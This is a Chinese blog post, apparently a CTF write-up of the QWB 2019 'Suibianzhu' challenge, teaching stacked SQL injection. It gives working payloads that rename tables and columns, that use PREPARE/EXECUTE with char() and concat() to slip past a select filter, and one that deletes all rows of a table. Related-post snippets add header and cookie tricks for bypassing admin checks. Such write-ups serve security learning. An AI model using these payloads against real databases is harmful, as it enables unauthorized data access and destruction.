(二)强网杯2019[随便注]

最新推荐文章于 2025-05-19 11:56:00 发布
最新推荐文章于 2025-05-19 11:56:00 发布
阅读量3k 收藏
点赞数 1
文章标签: web安全 sql database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_53856457/article/details/121547180
版权
本文详细介绍了SQL注入中的堆叠注入与预处理语句利用方法。堆叠注入允许攻击者执行多条SQL语句,通过分号分隔,实现对数据库的更广泛操作,例如查询与删除数据。而预处理语句利用可以通过变量与函数拼接SQL,绕过过滤限制。文中给出了具体示例,包括重命名表、修改列名及利用预处理语句构造payload来获取敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  1. 堆叠注入学习(堆叠查询,Stacked Queries)

堆叠注入为攻击者提供了很多控制权,与仅限于SELECT语句的UNION联合查询攻击不同,堆叠注入可以用于执行任何SQL语句。

堆叠注入原理

在sql中,分号表示一条语句的结束。如果在分号的后面再加一条语句,这条语句也可以被执行,继续加一个分号和一条语句,这样就可以在一次数据库的调用中执行多个语句。

举个堆叠注入攻击的例子

执行查询时,第一个语句执行信息查询,第二个语句则将表user的所有内容给删除了。

mysql> select * from users where id =1;delete from users;

堆叠注入的局限性

堆叠注入并不是在每种情况下都能使用的。大多数时候,因为API或数据库引擎的不支持,堆叠注入都无法实现。

img

2. 方法一:重命名+堆叠注入

1. 发现可以利用 or 把表中所有数据都查询出来,但是并没有我们需要的flag

img

img

2.先看一下库名,发现很多函数都被过滤了。由于select被过滤了,union查询也就用不上了。**

img

3.尝试一下堆叠注入,果然可以,把全部库名都给查出来了

img

  1. OK继续查表名

img

  1. 查看表结构 ,可以发现flag在1919810931114514表里**

0';desc `1919810931114514`;#

  

img

注意:在windows系统下,反单引号(`)是数据库、表、索引、列和别名用的引用符

eg. mysql> SELECT * FROM table WHERE id = '123' ;

1919810931114514必须用反单引号括起来(但是words不需要,应该是和数据类型有关)

6. 再查看words表的结构,发现一共有id和data两列。

0';desc words;#

img

那么可以猜测我们提交查询的窗口就是在这个表里查询数据的

7. 那么查询语句很有可能是 : selsect id,data from words where id =

因为可以堆叠查询,这时候就想到了一个改名的方法,把words随便改成words1,然后把1919810931114514改成words,再把列名flag改成id,结合上面的1' or 1=1#爆出表所有内容就可以查flag啦

payload:

0';rename table words to words1;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc  words;#

img

  1. 再用一下一开始的操作id=1' or 1=1#**

img

0x03 方法二:预处理语句+堆叠注入

预处理语句使用方式:

img

PREPARE x from '[my sql sequece]';  //预定义SQL语句
EXECUTE x; //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE x; //删除预定义SQL语句

 预定义语句也可以通过变量进行传递: 

SET @tn = 'hahaha'; //存储表名
SET @sql = concat('select * from ', @tn); //存储SQL语句
PREPARE x from @sql; //预定义SQL语句
EXECUTE x; //执行预定义SQL语句
(DEALLOCATE || DROP) x; //删除预定义SQL语句

本题即可利用 char() 函数将select的ASCII码转换为select字符串,接着利用concat()函数进行拼接得到select查询语句,从而绕过过滤。或者直接用concat()函数拼接select来绕过。

char(115,101,108,101,99,116)<----->'select'

payload1:不使用变量

1';PREPARE x from concat(char(115,101,108,101,99,116), ' * from `1919810931114514` ');EXECUTE x;#

payload2:使用变量

1';SET @sqli=concat(char(115,101,108,101,99,116),'* from `1919810931114514`');PREPARE x from @sqli;EXECUTE x;#

payload3:只是用contact(),不使用char()

1';PREPARE x from concat('s','elect', ' * from `1919810931114514` ');EXECUTE x;#

直接输入这三个payload的任何一个都能获得flag

uf9n1x
关注
BUUCTF Web [强网 2019]随便
2501_90251165的博客
01-16 913
进入题目链接后,是一个「查询」功能,在输入框中提交id,即可返回「响应」的内容。在输入框中输入一个2,即可查询2对应的内容。
【BUUCTF】web强网2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
【反序列化】广东省第三界强网_API
serendipity1130的博客
08-28 1045
考点:反序列化、json格式 1.根据提示访问api,发现要进行上传filename 2.当post的filename=index.php会提示:sorry,json_decode error! 3.所以post一个json格式的data:filename={"file":"../index.php"},filename={"file":"../hack.php"}可以读到两个php的源代码: 4.代码审计:x参数调用了一个新的hack类,最后会输出x会执行读取文件的函数,读取文件的函数在hac
第三届广东省强网安全大赛WEB题writeup
qq_28205153的博客
11-04 4299
1. 小明又被拒绝了 直接访问根目录,报403错误 一般是做了ip限制,加上 X-Forwarded-For 头即可绕过 接着又提示不是管理员,仔细看响应头的 Set-Cookie ,有个 admin=0 ,很明显是通过Cookie来判断是否是管理员,直接在请求中加个 Cookie:admin=1 即可绕过,获取flag. 2.XX? 直接访问根目录,发现是个百度页面,看了下源码,没什...
强网2019 随便
2401_83972784的博客
11-21 383
看见flag直接出现了,怎么查询呢,没思路了,看了wp,学到一个骚操作,猜测这里输入1后返回的是words表里面的数据。看见select被过滤了,那应该后面查询时候又要用拼接之类的查询方式了,先试试堆叠入可不可用。可知列数为,就在我以为这么简单的时候,union select输入就出来了被过滤的语句。sqlmap是没有灵魂的,手工入呗,先看看随便输入一个值页面有什么反应。就可以达到,将words表修改成words1,将拎一个表修改成words。堆叠入可用,继续查询表名。正常手工入,先求个闭合。
buuctf[强网2019随便]
2403_89727669的博客
04-09 292
但是他的数据类型为int,而data与flag的类型均为varchar,所以我们在这里获得思路,可以将。发现words里面有两个字段,另一个只有一个字段,所以后台的查询语句应为。中新添加id字段,然后words的名字改为任意的,输入有关select的命令发现。
[强网 2019]随便1
m0_74741186的博客
10-18 903
还有堆叠入可以测试,只需要加分号就可以了,这个试了好久,发现没加单引号,没有吧前面的语句闭合,就执行不了后面的sql语句。不管是报错入,布尔盲都需要用到select,报错入查数据库名字不需要用到select。查表然后再查列吧,但是查列好像要指定表,查表不要指定因为,默认查的是当前数据库的表。这里是比较难的,因为查到表了,我们就要开始查数据了,但是查数据又要用到select。然后入之后的语句应该是这样的,语句后面应该加个释,好像不释也可以。这个是单引号入,他的源代码应该是这样的。
[强网 2019]随便
m0_56691564的博客
11-30 3036
该题作者在页面就查了这两个字段的内容,由于该题禁用select,因此我们可以用作者原本设定的查表函数来帮我们查我们想要查找的内容。用rename把words表改名为其他的表名,把 1919810931114514表的名字改为words,给words表添加新的列名id,将flag改名为data。大意应该是过滤了select,绕过一下,好的发现绕过不了,不管是编码还是释都不行,因此这个题使用堆叠入。由show的作用可知,words表内就两个字段,一个叫id,一个叫data。
BUUCTF[强网 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网 2019]随便 1’ or 1=1 #
[强网 2019]随便 1
2301_80148821的博客
11-10 596
mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。HANDLER语句提供通往表的直接通道的存储引擎接口,可以用于MyISAM和InnoDB表。
BUUCTF -web- [强网 2019]随便
qq_44640313的博客
12-14 3072
以buuctf的强网2019为例的堆叠
[强网 2019]随便.docx
12-18
强网 2019SQL 入详解 SQL 入是一种常见的安全漏洞,攻击者通过在输入参数中嵌入恶意的 SQL 代码,从而控制或篡改数据库的行为。在本题中,参赛者面对的就是一道典型的 SQL 入题目。首先,通过尝试...
WEB安全--Java安全--shiro550反序列化漏洞
m0_74800552的博客
05-16 500
shiro550反序列化
安全-等级保护(等保) 2-7-1 GB/T 25058—2019 第5章 等级保护对象定级与备案
项目管理到售前,一路成长的伙伴!
05-19 463
4. GBT 22239-2019 +GBT 25070—2019 《信息安全技术 安全等级保护基础要求》+《信息安全技术 安全等级保护安全设计技术要求》一到四级对比表格(在基础要求中添加安全设计技术要求,安全设计技术要求主要用于开发人员和产品经理)个人见解说明:行业/领域定级工作,主要是各个行业/领域的主管部门制定,比如电力、金融等行业都有单独发布等级保护的要求,和通用等级保护要求有一定差异,会根据本行业的业务特性进行制定。GB/T 22240—2020《信息安全技术 安全等级保护定级指南》
安全-等级保护(等保) 2-7-2 GB/T 25058—2019 第6章 总体安全规划
项目管理到售前,一路成长的伙伴!
05-19 974
等。
Web安全核心内容与常见漏洞总结
weixin_47389477的博客
05-14 418
启用 ‌Content Security Policy(CSP)‌ 限制脚本加载源,阻断 XSS 攻击链。使用参数化查询(Prepared Statements)防御 SQL 入。对用户输入进行严格校验(如正则表达式匹配),过滤特殊字符(如。输出数据时进行 HTML 实体编码,避免 XSS 攻击。实现细粒度权限管理(如 RBAC 模型),避免越权操作。部署 ‌Web 应用防火墙(WAF)‌ 过滤恶意流量。使用 SSL/TLS 加密数据传输,防止中间人攻击6。制使用多因素认证(MFA)提升账户安全性。
安全-等级保护(等保) 2-7-4 GB/T 25058—2019 第8章 安全运行与维护 第9章 定级对象终止
最新发布
项目管理到售前,一路成长的伙伴!
05-19 849
根据不同的安全保护等级要求的控制粒度,分析所需要运行管理控制内容,并以此定义不同运行管 理角色的职责。
安全-等级保护(等保) 2-5-1 GB/T 25070—2019 附录B (资料性附录)第三级系统安全保护环境设计示例
项目管理到售前,一路成长的伙伴!
05-19 475
引用斜体:为非本文件内容,个人解说明。
安全SQL
Dalik1018的博客
05-12 2938
SQL 入是一种常见的络攻击手段,它专门针对程序员在编写代码时的疏忽。你在册了一个账号,填写用户名和密码后点击提交。正常情况下,站会将你输入的信息发送到数据库进行验证,看看用户名是否存在,密码是否正确。但如果站对用户输入的数据没有进行严格的检查,黑客就有机会在你输入的内容里添加一些特殊的 SQL 语句。
buuctf-强网2019随便
09-03
buuctf-强网2019随便是一场2019强网举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值